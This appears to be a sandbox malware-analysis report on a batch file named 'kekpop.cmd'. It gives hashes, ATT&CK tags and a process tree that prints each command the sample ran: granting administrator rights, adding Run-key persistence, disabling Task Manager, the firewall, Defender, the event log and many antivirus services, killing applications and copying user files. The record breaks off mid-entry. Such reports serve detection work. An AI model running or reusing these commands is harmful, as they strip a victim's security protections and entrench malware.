4539abba5b497555fd5b7ab3275ea1894e698f826e8af2eb2cca83acdbcd88e2

General

Target

kekpop.cmd
Size

47KB
MD5

f190183b6a6f55daa406c25cf5da66d8
SHA1

89168542e0cec21bbafeafe39361994194576f61
SHA256

ea81248fddbf9080018845bf7862b9ceb8ab942526c1adcf20030f043c57ad99
SHA512

e28483273e68945b12baf8319ddafc58a65e82883c79fec47add970429f7b8ac02d91b7f68612058c0530ae6bfd66af959a0f6222e09acc81e816ca34c3ec448

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_6759_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kekpop.cmd"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1664 taskkill.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1820 reg.exe
NTFS ADS 1 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Users\Admin\AppData\Local\Temp\%qBRee:~23 cmd.exe
Runs net.exe

pid	process
1664	taskkill.exe

pid	process
1820	reg.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%qBRee:~23	cmd.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

powershell.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepowershell.exe

pid	process
1468	powershell.exe
1468	powershell.exe
1868	tskill.exe
1868	tskill.exe
1656	tskill.exe
1656	tskill.exe
560	tskill.exe
560	tskill.exe
1340	tskill.exe
1340	tskill.exe
1672	tskill.exe
1672	tskill.exe
1900	tskill.exe
1900	tskill.exe
812	tskill.exe
812	tskill.exe
1688	tskill.exe
1688	tskill.exe
968	tskill.exe
968	tskill.exe
1904	tskill.exe
1904	tskill.exe
1276	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exetaskkill.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1468 powershell.exe
Token: SeDebugPrivilege 1664 taskkill.exe
Token: SeDebugPrivilege 1276 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1276	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.execmd.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1296 wrote to memory of 1988	1296	cmd.exe	attrib.exe
PID 1296 wrote to memory of 1988	1296	cmd.exe	attrib.exe
PID 1296 wrote to memory of 1988	1296	cmd.exe	attrib.exe
PID 1296 wrote to memory of 1468	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1468	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1468	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1564	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1564	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1564	1296	cmd.exe	net.exe
PID 1564 wrote to memory of 1760	1564	net.exe	net1.exe
PID 1564 wrote to memory of 1760	1564	net.exe	net1.exe
PID 1564 wrote to memory of 1760	1564	net.exe	net1.exe
PID 1296 wrote to memory of 1608	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1608	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1608	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1820	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1820	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1820	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1628	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1628	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1628	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1548	1296	cmd.exe	rundll32.exe
PID 1296 wrote to memory of 1548	1296	cmd.exe	rundll32.exe
PID 1296 wrote to memory of 1548	1296	cmd.exe	rundll32.exe
PID 1296 wrote to memory of 1532	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 1532	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 1532	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 1340	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1340	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1340	1296	cmd.exe	net.exe
PID 1340 wrote to memory of 1772	1340	net.exe	net1.exe
PID 1340 wrote to memory of 1772	1340	net.exe	net1.exe
PID 1340 wrote to memory of 1772	1340	net.exe	net1.exe
PID 1296 wrote to memory of 1664	1296	cmd.exe	taskkill.exe
PID 1296 wrote to memory of 1664	1296	cmd.exe	taskkill.exe
PID 1296 wrote to memory of 1664	1296	cmd.exe	taskkill.exe
PID 1532 wrote to memory of 1700	1532	cmd.exe	scrnsave.scr
PID 1532 wrote to memory of 1700	1532	cmd.exe	scrnsave.scr
PID 1532 wrote to memory of 1700	1532	cmd.exe	scrnsave.scr
PID 1296 wrote to memory of 1560	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1560	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1560	1296	cmd.exe	net.exe
PID 1560 wrote to memory of 1868	1560	net.exe	net1.exe
PID 1560 wrote to memory of 1868	1560	net.exe	net1.exe
PID 1560 wrote to memory of 1868	1560	net.exe	net1.exe
PID 1296 wrote to memory of 700	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 700	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 700	1296	cmd.exe	net.exe
PID 700 wrote to memory of 1012	700	net.exe	net1.exe
PID 700 wrote to memory of 1012	700	net.exe	net1.exe
PID 700 wrote to memory of 1012	700	net.exe	net1.exe
PID 1296 wrote to memory of 1840	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1840	1296	cmd.exe	net.exe
PID 1296 wrote to memory of 1840	1296	cmd.exe	net.exe
PID 1840 wrote to memory of 1224	1840	net.exe	net1.exe
PID 1840 wrote to memory of 1224	1840	net.exe	net1.exe
PID 1840 wrote to memory of 1224	1840	net.exe	net1.exe
PID 1296 wrote to memory of 952	1296	cmd.exe	netsh.exe
PID 1296 wrote to memory of 952	1296	cmd.exe	netsh.exe
PID 1296 wrote to memory of 952	1296	cmd.exe	netsh.exe
PID 1296 wrote to memory of 1072	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 1072	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 1072	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 1736	1296	cmd.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1988 attrib.exe

pid	process
1988	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\kekpop.cmd"
1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\kekpop.cmd
2⤵
- Views/modifies file attributes
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
3⤵
PID:1760

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_6759_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\kekpop.cmd /f
2⤵
- Adds Run key to start application
PID:1608

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
2⤵
- Adds Run key to start application
- Modifies registry key
PID:1820

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
2⤵
PID:1628

C:\Windows\system32\rundll32.exe
RUNDLL32 USER32.DLL SwapMouseButton
2⤵
PID:1548

C:\Windows\system32\net.exe
net stop "WinDefend"
2⤵
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
3⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1400

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1620

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1976

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1728

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1056

C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\system32\net.exe
net stop "wuauserv"
2⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
3⤵
PID:1868

C:\Windows\system32\net.exe
net stop "security center"
2⤵
- Suspicious use of WriteProcessMemory
PID:700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
3⤵
PID:1012

C:\Windows\system32\net.exe
net stop sharedaccess
2⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
3⤵
PID:1224

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
2⤵
PID:952

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1072

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1736

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:668

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1788

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1668

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1120

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1996

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1784

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1180

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1808

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:940

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1608

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1628

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1772

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1176

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1664

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1156

C:\Windows\system32\net.exe
net stop "Security Center" /y
2⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Security Center" /y
3⤵
PID:1276

C:\Windows\system32\net.exe
net stop "Automatic Updates" /y
2⤵
PID:1896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Automatic Updates" /y
3⤵
PID:1348

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:1448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:1396

C:\Windows\system32\net.exe
net stop "SAVScan" /y
2⤵
PID:1504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVScan" /y
3⤵
PID:1556

C:\Windows\system32\net.exe
net stop "norton AntiVirus Firewall Monitor Service" /y
2⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
3⤵
PID:468

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto-Protect Service" /y
2⤵
PID:1604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
3⤵
PID:336

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1068

C:\Windows\system32\net.exe
net stop "McAfee Spamkiller Server" /y
2⤵
PID:1672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
3⤵
PID:1900

C:\Windows\system32\net.exe
net stop "McAfee Personal Firewall Service" /y
2⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
3⤵
PID:812

C:\Windows\system32\net.exe
net stop "McAfee SecurityCenter Update Manager" /y
2⤵
PID:1896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
3⤵
PID:1076

C:\Windows\system32\net.exe
net stop "Symantec SPBBCSvc" /y
2⤵
PID:1448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
3⤵
PID:936

C:\Windows\system32\net.exe
net stop "Ahnlab Task Scheduler" /y
2⤵
PID:1504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
3⤵
PID:1468

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:1676

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1732

C:\Windows\system32\net.exe
net stop vrmonsvc /y
2⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vrmonsvc /y
3⤵
PID:1340

C:\Windows\system32\net.exe
net stop MonSvcNT /y
2⤵
PID:560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MonSvcNT /y
3⤵
PID:1900

C:\Windows\system32\net.exe
net stop SAVScan /y
2⤵
PID:1672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVScan /y
3⤵
PID:1688

C:\Windows\system32\net.exe
net stop NProtectService /y
2⤵
PID:812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NProtectService /y
3⤵
PID:1904

C:\Windows\system32\net.exe
net stop ccSetMGR /y
2⤵
PID:968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMGR /y
3⤵
PID:1076

C:\Windows\system32\net.exe
net stop ccEvtMGR /y
2⤵
PID:1896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMGR /y
3⤵
PID:1716

C:\Windows\system32\net.exe
net stop srservice /y
2⤵
PID:936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop srservice /y
3⤵
PID:1448

C:\Windows\system32\net.exe
net stop "Symantec Network Drivers Service" /y
2⤵
PID:1836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
3⤵
PID:1468

C:\Windows\system32\net.exe
net stop "norton Unerase Protection" /y
2⤵
PID:1504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton Unerase Protection" /y
3⤵
PID:1744

C:\Windows\system32\net.exe
net stop MskService /y
2⤵
PID:1676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MskService /y
3⤵
PID:1620

C:\Windows\system32\net.exe
net stop MpfService /y
2⤵
PID:1732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MpfService /y
3⤵
PID:1604

C:\Windows\system32\net.exe
net stop mcupdmgr.exe /y
2⤵
PID:1340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mcupdmgr.exe /y
3⤵
PID:1068

C:\Windows\system32\net.exe
net stop "McAfeeAntiSpyware" /y
2⤵
PID:1900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
3⤵
PID:560

C:\Windows\system32\net.exe
net stop helpsvc /y
2⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop helpsvc /y
3⤵
PID:1672

C:\Windows\system32\net.exe
net stop ERSvc /y
2⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ERSvc /y
3⤵
PID:812

C:\Windows\system32\net.exe
net stop "*norton*" /y
2⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*norton*" /y
3⤵
PID:968

C:\Windows\system32\net.exe
net stop "*Symantec*" /y
2⤵
PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*Symantec*" /y
3⤵
PID:1896

C:\Windows\system32\net.exe
net stop "*McAfee*" /y
2⤵
PID:1448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*McAfee*" /y
3⤵
PID:936

C:\Windows\system32\net.exe
net stop ccPwdSvc /y
2⤵
PID:1468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccPwdSvc /y
3⤵
PID:1836

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:1744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:1504

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:1676

C:\Windows\system32\net.exe
net stop "Serv-U" /y
2⤵
PID:1604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Serv-U" /y
3⤵
PID:1732

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1340

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:1900

C:\Windows\system32\net.exe
net stop "Symantec AntiVirus Client" /y
2⤵
PID:1672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
3⤵
PID:1688

C:\Windows\system32\net.exe
net stop "norton AntiVirus Server" /y
2⤵
PID:812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
3⤵
PID:1904

C:\Windows\system32\net.exe
net stop "NAV Alert" /y
2⤵
PID:968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NAV Alert" /y
3⤵
PID:1076

C:\Windows\system32\net.exe
net stop "Nav Auto-Protect" /y
2⤵
PID:1896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
3⤵
PID:1716

C:\Windows\system32\net.exe
net stop "McShield" /y
2⤵
PID:936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield" /y
3⤵
PID:1448

C:\Windows\system32\net.exe
net stop "DefWatch" /y
2⤵
PID:1836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "DefWatch" /y
3⤵
PID:1468

C:\Windows\system32\net.exe
net stop eventlog /y
2⤵
PID:1504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop eventlog /y
3⤵
PID:1744

C:\Windows\system32\net.exe
net stop InoRPC /y
2⤵
PID:1676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRPC /y
3⤵
PID:1620

C:\Windows\system32\net.exe
net stop InoRT /y
2⤵
PID:1732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRT /y
3⤵
PID:1604

C:\Windows\system32\net.exe
net stop InoTask /y
2⤵
PID:1340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoTask /y
3⤵
PID:1068

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:560

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:1672

C:\Windows\system32\net.exe
net stop "norton AntiVirus Corporate Edition" /y
2⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
3⤵
PID:812

C:\Windows\system32\net.exe
net stop "ViRobot Professional Monitoring" /y
2⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
3⤵
PID:968

C:\Windows\system32\net.exe
net stop "PC-cillin Personal Firewall" /y
2⤵
PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
3⤵
PID:1896

C:\Windows\system32\net.exe
net stop "Trend Micro Proxy Service" /y
2⤵
PID:1448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
3⤵
PID:936

C:\Windows\system32\net.exe
net stop "Trend NT Realtime Service" /y
2⤵
PID:1468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
3⤵
PID:1836

C:\Windows\system32\net.exe
net stop "McAfee.com McShield" /y
2⤵
PID:1744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com McShield" /y
3⤵
PID:1504

C:\Windows\system32\net.exe
net stop "McAfee.com VirusScan Online Realtime Engine" /y
2⤵
PID:1348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
3⤵
PID:1868

C:\Windows\system32\net.exe
net stop "SyGateService" /y
2⤵
PID:1340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SyGateService" /y
3⤵
PID:560

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1672

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus" /y
2⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
3⤵
PID:812

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus Network" /y
2⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
3⤵
PID:968

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Job Server" /y
2⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
3⤵
PID:1896

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Realtime Server" /y
2⤵
PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
3⤵
PID:936

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1836

C:\Windows\system32\net.exe
net stop "eTrust Antivirus RPC Server" /y
2⤵
PID:1468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
3⤵
PID:1400

C:\Windows\system32\net.exe
net stop netsvcs
2⤵
PID:1136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop netsvcs
3⤵
PID:1744

C:\Windows\system32\net.exe
net stop spoolnt
2⤵
PID:1748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop spoolnt
3⤵
PID:1732

C:\Windows\system32\tskill.exe
tskill iexplore
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1868

C:\Windows\system32\tskill.exe
tskill msnmsgr
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656

C:\Windows\system32\tskill.exe
tskill excel
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:560

C:\Windows\system32\tskill.exe
tskill iTunes
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1340

C:\Windows\system32\tskill.exe
tskill calc
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1672

C:\Windows\system32\tskill.exe
tskill msaccess
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1900

C:\Windows\system32\tskill.exe
tskill safari
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:812

C:\Windows\system32\tskill.exe
tskill mspaint
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1688

C:\Windows\system32\tskill.exe
tskill outlook
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Windows\system32\tskill.exe
tskill WINWORD
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\ApproveSkip.ps1
2⤵
PID:1896

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\CloseDismount.clr
2⤵
PID:1076

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\CloseSet.WTV
2⤵
PID:936

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\ConfirmConvertTo.ps1
2⤵
PID:1716

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\ConnectGroup.ppsm
2⤵
PID:468

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\ExportTrace.xht
2⤵
PID:1056

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\InitializeCompress.docx
2⤵
PID:1224

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\InstallBlock.xps
2⤵
PID:2016

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\InvokeReset.wmf
2⤵
PID:1676

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\LimitRevoke.jpe
2⤵
PID:1504

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\NewLimit.3gp
2⤵
PID:1604

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\NewMount.easmx
2⤵
PID:1620

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\OpenGroup.wmv
2⤵
PID:1348

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\RedoRemove.MOD
2⤵
PID:1276

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\RepairExport.xlsx
2⤵
PID:560

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\ResolveConvertFrom.rmi
2⤵
PID:1340

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\RestartApprove.aiff
2⤵
PID:1672

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\SplitMeasure.pptx
2⤵
PID:1900

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\UndoRepair.wav
2⤵
PID:812

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Desktop\UnregisterCheckpoint.exe
2⤵
PID:1688

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\Are.docx
2⤵
PID:968

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\black.bat
2⤵
PID:1904

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\ConvertFromEnable.rtf
2⤵
PID:1896

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\DenyResume.ods
2⤵
PID:1684

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\DismountPing.odt
2⤵
PID:1452

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\ExitClear.odp
2⤵
PID:468

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\ExportSync.vsw
2⤵
PID:1224

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\Files.docx
2⤵
PID:1744

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\FormatNew.mhtml
2⤵
PID:1136

C:\Windows\system32\xcopy.exe
